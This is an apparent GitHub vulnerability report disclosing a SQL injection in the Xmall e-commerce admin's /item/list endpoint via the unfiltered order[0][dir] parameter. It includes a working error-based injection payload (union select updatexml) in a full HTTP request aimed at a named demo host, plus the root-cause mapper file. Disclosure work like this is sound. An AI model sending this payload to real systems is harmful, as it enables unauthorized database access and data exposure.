You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
[Vulnerability details]
Send the payload below to the interface /item/list
GET /item/list?draw=1&order%5B0%5D%5Bcolumn%5D=1&order%5B0%5D%5Bdir%5D=desc)a+union+select+updatexml(1,concat(0x7e,database(),0x7e,user(),0x7e),1)%23;&start=0&length=1&search%5Bvalue%5D=&search%5Bregex%5D=false&cid=-1&_=1679041197136 HTTP/1.1Host: xmadmin.exrick.cnAccept: application/json, text/javascript, */*; q=0.01DNT: 1X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36Referer: http://xmadmin.exrick.cn/product-listAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,or;q=0.7Cookie: JSESSIONID=359A406116392BB0456356EFBCF068FCConnection: close
[Impact Code execution]
true
[Cause of vulnerability]
In the /item/list interface, the order[0][dir] parameter is not filtered and passed into the getItemList function.
Then it is passed into the selectItemByCondition function.
In xmall-manager\xmall-manager-dao\src\main\java\cn\exrick\manager\mapper\TbItemMapper.xml, the orderDir parameter is used in ${} format, leading to a SQL injection vulnerability.
[Suggested description]
Xmall was discovered to contain a SQL injection vulnerability via the orderDir parameter.
[Vulnerability Type]
SQLi
[Vendor of Product]
https://github.com/Exrick/xmall
[Affected Product Code Base]
all version
[Affected Component]
[Attack Type]
Remote
[Vulnerability details]
Send the payload below to the interface
/item/list
[Impact Code execution]
true
[Cause of vulnerability]



In the
/item/list
interface, theorder[0][dir]
parameter is not filtered and passed into thegetItemList
function.Then it is passed into the
selectItemByCondition
function.In
xmall-manager\xmall-manager-dao\src\main\java\cn\exrick\manager\mapper\TbItemMapper.xml
, theorderDir
parameter is used in${}
format, leading to a SQL injection vulnerability.And there are the other similar interfaces:
That's all, thanks.
The text was updated successfully, but these errors were encountered: